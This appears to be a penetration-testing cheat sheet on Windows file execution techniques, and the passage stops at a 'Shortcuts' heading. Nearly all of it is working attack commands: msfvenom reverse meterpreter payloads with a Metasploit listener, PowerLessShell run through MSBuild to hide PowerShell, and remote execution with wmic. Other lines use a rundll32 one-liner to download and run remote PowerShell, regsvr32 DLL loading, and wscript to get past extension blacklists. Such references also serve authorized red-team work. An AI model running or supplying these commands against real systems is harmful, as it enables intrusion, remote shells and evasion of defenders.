# File Execution Methods ### Explorer ```bash explorer.exe /root,"C:\Windows\System32\calc.exe" explorer.exe /root,"C:\Windows\Temp\Shell.exe" ``` ### PowerLessShell PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the `PowerShell` process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code. **GitHub:** After cloning the repository, generate a `msfvenom` payload as per the syntax shown below. ``` msfvenom -p windows/meterpreter/reverse_winhttps LHOST= LPORT=445 -f psh-reflection > shell.ps1 ``` Set a `Metasploit` listener ``` msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost ;set lport 445;exploit" ``` From the PowerLessShell repository build the project file. ```bash python2 PowerLessShell.py -type powershell -source ~/opt/shell.ps1 -output ~/opt/shell.csproj ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F11FmrlMauIijpVJ3ZAZ0%2Fimage.png?alt=media\&token=eb49425d-50c4-425c-b480-0f9622004a88) After building completes, transfer the `.csproj` file to the target system. Then use the command below to execute. (Framework versions will vary). ``` c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\windows\temp\shell.csproj ``` Wait a short while... ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXxCZXbmwTWtqfnRgGFyg%2Fimage.png?alt=media\&token=fee7c1f4-6c61-44eb-8cad-26a8bac4cf19) Where we should land a shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FSboJLZfoeBqxHhFxsABC%2Fimage.png?alt=media\&token=68a4bd99-4ac8-46d2-881c-cac70067bbc4) Checking the running processes on the target system whilst the shell is active shows no PowerShell.exe processes' running. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FYpPv0RY68Oq5E6fnavEv%2Fimage.png?alt=media\&token=a9e44469-73bf-44e6-b598-da2bd4524123) ### Wmic ```bash # Execute binary on local system wmic.exe process call create c\windows\temp\Shell.exe # Execute binary on remote system wmic.exe /node:"10.10.10.10" process call create "Shell.exe" ``` ### Rundll32 ```powershell # Execute JavaScript script that runs a PowerShell script from a remote server rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http:///');" # Execute a JavaScript script that runs calc.exe. rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); # Execute a DLL on a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint ``` ### Regsvr32 ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=445 -f dll -a x86 > Shell.dll ``` Upload to target system and execute. ``` regsvr32.exe c:\windows\temp\shell.dll ``` ### WScript Wscript can be used to run vbs file's which can be executed within text files to bypass file extension blacklisting. ``` c:\Windows\System32>wscript /e:VBScript c:\Users\moe\Desktop\shell.txt ``` ### Shortcuts \